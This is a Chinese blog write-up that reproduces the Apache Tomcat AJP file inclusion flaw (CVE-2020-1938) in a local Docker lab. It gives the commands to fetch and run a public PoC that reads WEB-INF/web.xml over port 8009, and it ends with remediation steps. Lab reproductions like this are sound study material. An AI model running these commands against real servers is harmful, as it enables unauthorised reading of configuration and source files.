Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938) 复现

最新推荐文章于 2024-05-10 21:36:12 发布
最新推荐文章于 2024-05-10 21:36:12 发布
阅读量5.4k 收藏 6
点赞数 2
分类专栏: # 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44108455/article/details/107726174
版权

0x01 漏洞概述

CVE-2020-1938 漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞。Tomcat 服务器作一个免费的开放源代码的Web 应用服务器,其安装后会默认开启ajp连接器,方便与其他web服务器通过ajp协议进行交互。

该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件,例如可以读取 webapp 配置文件或源代码。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。

0x02 影响范围

受影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

不受影响版本

Apache Tomcat = 7.0.100
Apache Tomcat = 8.5.51
Apache Tomcat = 9.0.31

0x03 环境搭建

本来想直接在vulfocus拉取镜像,但是发现8009端口貌似没开呀!于是乎就用docker拉取tomcat-8.5.32环境来复现了

docker搜索tomcat镜像

docker search tomcat-8.5.32

拉取镜像

docker pull duonghuuphuc/tomcat-8.5.32

在这里插入图片描述拉取完成后查看是否成功

docker images

在这里插入图片描述运行镜像并映射端口

docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32

并查看是否运行成功

docker ps -a

在这里插入图片描述
成功后访问系统地址
在这里插入图片描述nmap一下试试
在这里插入图片描述

0x04 使用poc利用漏洞

poc地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

在kali中克隆poc脚本到本地

git clone https://github.com/YDHCUI/CNVID-2020-10487-Tomcat-Ajp-lfi.git

在这里插入图片描述

python CNVID-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.152 -p 8009 -f WEB-INF/web.xml

在这里插入图片描述 至此,我们已成功复现CVE-2020-1938漏洞,利用文件包括含漏洞可进一步获得RCE, 可参考此文章:CVE-2020-1938 幽灵猫漏洞RCE

0x05 修复方案

临时禁用AJP协议8009端口,在conf/server.xml配置文件中注释掉<Connector port="8009" protocol="AJP/1.3"redirectPort="8443" />;
配置ajp配置中的secretRequired跟secret属性来限制认证;

0x06 参考链接

https://www.cnblogs.com/xyongsec/p/12340606.html
https://www.tqwba.com/x_d/jishu/106658.html
gclome
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Tomcat AJP文件包含漏洞复现(CVE-2020-1938)
谢公子的博客
02-21 7256
目录 背景 漏洞编号 漏洞等级 漏洞影响版本 漏洞复现 漏洞修复建议 背景 2020年02月20日, 国家信息安全漏洞共享平台(CNVD) 收录了CNVD-2020-10487Apache Tomcat文件包含漏洞 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和...
CVE-2020-1938 Apache-Tomcat-Ajp漏洞复现
Bin的博客
03-24 842
目录 一、概述 1.1漏洞编号:CVE-2020-1938   1.2危险等级:高 1.3描述 二、影响的版本 三、漏洞分析 四、复现步骤 环境介绍 4.1查看tomcat是否部署 4.2主机发现 4.3扫描端口(8009开放) 4.4下载读取文件的poc 4.5输入参数并执行 五、防御措施 六、危害 一、概述 1.1漏洞...
TomcatCVE-2020-1938 漏洞复现&解决
yjw2017的博客
09-14 1121
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
Aapache Tomcat AJP 文件包含漏洞CVE-2020-1938
最新发布
weixin_45653478的博客
05-10 416
CVE-2020-1938Apache Tomcat 中的一个严重安全漏洞,该漏洞涉及到 TomcatAJPApache JServ Protocol)连接器。由于 AJP 协议在处理请求时存在缺陷,攻击者可以利用此漏洞读取服务器上的任意文件,甚至可能进一步实现远程代码执行。
CVE-2020-1938 Tomcat文件包含漏洞复现
qq_49279082的博客
02-14 2628
CVE-2020-1938Tomcat文件包含漏洞复现
Tomcat 文件读取/文件包含漏洞复现CVE-2020-1938
oiadkt的博客
04-12 1634
Tomcat 文件读取/文件包含漏洞复现CVE-2020-1938
CVE-2020-1938 Tomcat 文件读取包含漏洞复现
yzl_007的博客
07-26 2545
CVE-2020-1938 Tomcat 文件读取包含漏洞复现 一次偶然的契机,起源于自己的站被日了,太菜了没找到原因,然后逛了逛室友的站,室友的友链中随便点了点友链什么的,发现shadon发现开了很多端口,并且同时打开了8009和8080 想到最近爆出的文件包含漏洞,扫一下果真存在,也验证成功了,读取到了web.xml的源码 用网上的脚本跑一下,读取WEB-INF/web.xml文件 读取ROOT目录下的build.xml文件内容,没用这个文件,就会跳转到错误页面 下面是自己搭建环境后的CVE-
Windows下Aapache2.0.55+Tomcat5.0负载均衡配置-修改版.doc
07-08
对于Tomcat 5.0.28,你只需将文件复制到指定目录(如E:\Tomcat 5.0_1和E:\Tomcat 5.0_2)。这两个Tomcat实例将作为负载均衡集群的一部分。 4. **安装Mod_jk模块**: 将mod_jk-apache-2.0.55.so文件重命名为mod_jk...
apache-roller-src
03-02
apache-rolapacapache-roller-srche-roller-srcler-srcapache-aapache-roller-srcpache-roller-srcroller-apache-roller-srcapache-roller-srcsrcapache-roller-src
Lending-Club-Loan-Analysis:使用Apache Spark和PySpark进行解释性数据分析和ML模型构建
05-04
这是一个开源数据集,其中包含2007年至2015年间发放的所有贷款的完整贷款数据。 可在以下站点上下载数据-https //www.kaggle.com/wendykan/lending-club-loan-data 数据描述Lending Club是一个在线的P2P信贷市场,...
Foodies-restaurant-Website:我已经为Foodies Restaurant开发了一个功能齐全的网站
02-05
美食家网站- 我已经为Foodies Restaurant开发了一个功能齐全的网站后端工作是使用PHP AJax MySQL XAMPP 使用开发前端工作CSS3 AJax HTML5执行步骤1)安装Xmapp并从Xmapp控制面板打开mysql和Aapache 步骤2)将这个...
Aapache_hbase_reference_guide
01-24
Aapache_hbase_reference_guide PDF 英文版
CVE-2020-1938漏洞复现(文末附EXP代码)
热门推荐
Vitaminapple的博客
05-31 1万+
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y
Tomcat AJP 文件包含漏洞CVE-2020-1938
m0_61506558的博客
11-20 7788
1.漏洞简介1.漏洞简介2020年2月20日,公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞CVE-2020-1938)。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于TomcatAJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控参数。
Tomcat AJP 文件包含漏洞CVE-2020-1938) 修复方案 及其思考
weixin_53883156的博客
03-22 894
Tomcat 配置了两个 Connector,它们分别是 HTTP 和 AJP :HTTP 默认端口为 8080,处理 http 请求,而 AJP 默认端口 8009,用于处理 AJP 协议的请求,而 AJP 比 http 更加优化,多用于反向、集群等,漏洞由于 Tomcat AJP 协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器 webapp 下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取 shell。
Aapache Tomcat AJP 文件包含漏洞-(CVE-2020-1938/CNVD-2020-10487)
tamchikit的博客
01-04 960
Aapache Tomcat AJP 文件包含漏洞-(CVE-2020-1938/CNVD-2020-10487)
CVE-2020-1938Apache Tomcat AJP 漏洞复现和分析
渗透测试研究中心
05-11 1446
一、漏洞描述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache TomcatAJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能...
Tomcat任意文件读取 文件包含漏洞复现CVE-2020-1938/CNVD-2020-10487)
jiji_king的博客
07-09 2323
个人笔记
【网络安全---漏洞复现Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJPApache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CentOs 7 安装Aapache
06-07
好的,以下是在 CentOS 7 系统上安装 Apache 的步骤: 1. 打开终端,以 root 用户身份执行以下命令更新软件包: ``` yum update ``` 2. 执行以下命令安装 Apache: ``` yum install httpd ``` 3. 安装完成后,执行以下命令启动 Apache 服务: ``` systemctl start httpd.service ``` 4. 如果需要在系统启动时自动启动 Apache 服务,可以执行以下命令: ``` systemctl enable httpd.service ``` 此时,Apache 服务器已经安装完成并启动了。你可以在浏览器中输入服务器的 IP 地址或者域名查看 Apache 的默认页面。默认页面的路径为 /var/www/html/index.html。 希望以上内容能对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值